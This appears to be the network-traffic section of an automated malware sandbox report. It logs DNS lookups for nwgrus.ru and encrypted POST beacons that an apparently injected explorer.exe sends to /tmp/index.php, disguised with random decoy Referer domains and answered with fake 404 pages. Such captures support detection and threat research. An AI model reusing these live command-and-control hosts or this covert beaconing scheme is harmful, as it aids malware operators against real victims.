                                                                    Oct 14, 2024 06:06:11.776343107 CEST5003880192.168.2.6211.171.233.129
                                                                    Oct 14, 2024 06:06:11.776376009 CEST5003880192.168.2.6211.171.233.129
                                                                    Oct 14, 2024 06:06:11.781261921 CEST8050038211.171.233.129192.168.2.6
                                                                    Oct 14, 2024 06:06:11.781315088 CEST8050038211.171.233.129192.168.2.6
                                                                    Oct 14, 2024 06:06:13.269507885 CEST8050038211.171.233.129192.168.2.6
                                                                    Oct 14, 2024 06:06:13.269561052 CEST8050038211.171.233.129192.168.2.6
                                                                    Oct 14, 2024 06:06:13.270042896 CEST5003880192.168.2.6211.171.233.129
                                                                    Oct 14, 2024 06:06:13.270133972 CEST5003880192.168.2.6211.171.233.129
                                                                    Oct 14, 2024 06:06:13.275003910 CEST8050038211.171.233.129192.168.2.6
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 14, 2024 06:02:35.865875006 CEST5093253192.168.2.61.1.1.1
                                                                    Oct 14, 2024 06:02:36.859611034 CEST5093253192.168.2.61.1.1.1
                                                                    Oct 14, 2024 06:02:37.875413895 CEST5093253192.168.2.61.1.1.1
                                                                    Oct 14, 2024 06:02:39.880238056 CEST5093253192.168.2.61.1.1.1
                                                                    Oct 14, 2024 06:02:40.024979115 CEST53509321.1.1.1192.168.2.6
                                                                    Oct 14, 2024 06:02:40.025001049 CEST53509321.1.1.1192.168.2.6
                                                                    Oct 14, 2024 06:02:40.025012016 CEST53509321.1.1.1192.168.2.6
                                                                    Oct 14, 2024 06:02:40.025026083 CEST53509321.1.1.1192.168.2.6
                                                                    Oct 14, 2024 06:05:13.547768116 CEST5606053192.168.2.61.1.1.1
                                                                    Oct 14, 2024 06:05:14.563180923 CEST5606053192.168.2.61.1.1.1
                                                                    Oct 14, 2024 06:05:15.562882900 CEST5606053192.168.2.61.1.1.1
                                                                    Oct 14, 2024 06:05:16.538158894 CEST53560601.1.1.1192.168.2.6
                                                                    Oct 14, 2024 06:05:16.538187027 CEST53560601.1.1.1192.168.2.6
                                                                    Oct 14, 2024 06:05:16.538199902 CEST53560601.1.1.1192.168.2.6
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 14, 2024 06:02:35.865875006 CEST192.168.2.61.1.1.10xe2f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:36.859611034 CEST192.168.2.61.1.1.10xe2f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:37.875413895 CEST192.168.2.61.1.1.10xe2f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:39.880238056 CEST192.168.2.61.1.1.10xe2f4Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:13.547768116 CEST192.168.2.61.1.1.10x1cd3Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:14.563180923 CEST192.168.2.61.1.1.10x1cd3Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:15.562882900 CEST192.168.2.61.1.1.10x1cd3Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.024979115 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025001049 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025012016 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:02:40.025026083 CEST1.1.1.1192.168.2.60xe2f4No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538158894 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538187027 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                    Oct 14, 2024 06:05:16.538199902 CEST1.1.1.1192.168.2.60x1cd3No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                    • fxrdkpxlrlca.com
                                                                      • nwgrus.ru
                                                                    • rxkflswhfdlbttc.org
                                                                    • tagqqmqbryxkm.org
                                                                    • plwcwjrcahoa.net
                                                                    • pucwrkwjfycmguw.com
                                                                    • tqcdafuvgwwyn.com
                                                                    • dujexgghfqd.net
                                                                    • qhntbwctbsxu.com
                                                                    • numxyybjlxnij.org
                                                                    • qxvvlpafyplsfmh.net
                                                                    • agcejdimcyykepgs.org
                                                                    • sbsqbgjbfyr.com
                                                                    • kqejwgffiikyio.org
                                                                    • evinpfxalwnnmcek.net
                                                                    • vsgvwtqctrqw.com
                                                                    • aspcynlesjwhi.net
                                                                    • jkejxmgpctomkc.net
                                                                    • doyodlaoiwpyujb.com
                                                                    • foywayqrovd.org
                                                                    • eekncfsmpbrkmlo.com
                                                                    • clxaxfnyuedfqps.com
                                                                    • uimdgsgyvhhaem.com
                                                                    • eeyuetrukjpircst.net
                                                                    • ydaciekeaeuaol.org
                                                                    • voyqfwrggnp.net
                                                                    • blxnotvrjvnu.org
                                                                    • fplvqqohjqdma.com
                                                                    • rdjriakbylriblg.org
                                                                    • sgyfmqyxpkmdbygm.net
                                                                    • eyrnjiqpamojnvp.com
                                                                    • rlfugmueckmpbf.com
                                                                    • hykquqealhec.org
                                                                    • wcfowkxogmtykxos.net
                                                                    • mxgxdupfkhdkpgcd.org
                                                                    • wrowxfwdtnqpxb.com
                                                                    • shukyhyxsnyt.com
                                                                    • oytavkgbvwgngwdq.net
                                                                    • qcthmhytlnkrqkwa.org
                                                                    • irmipcatkrgbgkn.org
                                                                    • cxjsppdhykfhkdy.net
                                                                    • wmcfxulhyyb.net
                                                                    • nhfvlqknfjyv.net
                                                                    • kdpqwaweroenq.com
                                                                    • qymlmmmarfrlf.org
                                                                    • sjchoqywbhy.net
                                                                    • lfpsmslcgfbr.org
                                                                    • vpqrqumkciggjbf.net
                                                                    • yprnusgmnhodqa.org
                                                                    • hwgseaeonxo.org
                                                                    • lxdpanclboemkjpp.org
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.649862125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:40.032846928 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://fxrdkpxlrlca.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 303
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:40.032867908 CEST303OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 30 b2 ad
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu~0P/BPstu8g4g:vC>-49BOSp`P1QdSsA7$XFzE,@L(mq_YVsVCo
                                                                    Oct 14, 2024 06:02:41.580789089 CEST152INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:41 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 04 00 00 00 72 e8 87 e8
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.649873125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:41.594649076 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://rxkflswhfdlbttc.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 178
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:41.594671965 CEST178OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 72 0c de fb
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vurbTjRI]Q4)/UqmAR!-G]7Ty6E5'm9t$A
                                                                    Oct 14, 2024 06:02:43.242265940 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:42 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.649884125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:43.255192995 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://tagqqmqbryxkm.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 222
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:43.255213976 CEST222OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 77 24 a3 91
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuw$GP|TCya$$5a_O&'et#Q{I)P7BrD}TGq%[Y\X}oqf5
                                                                    Oct 14, 2024 06:02:44.741344929 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:44 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.649895125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:44.749665976 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://plwcwjrcahoa.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 295
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:44.749686003 CEST295OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3e 50 c9 a1
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu>Px0q]I/}q?\6e>j0AAG>%'RW5<`~h73V>"p6R3gN.CG=V0~'jST
                                                                    Oct 14, 2024 06:02:46.242067099 CEST137INHTTP/1.1 200 OK
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:45 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.649906125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:02:46.250042915 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://pucwrkwjfycmguw.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 241
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:02:46.250042915 CEST241OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4c 08 af b9
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuLl=oFk&+b45-k:g/YI#n'LPg';)_2(z.CVDguImkv$z
                                                                    Oct 14, 2024 06:02:47.819247007 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:02:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
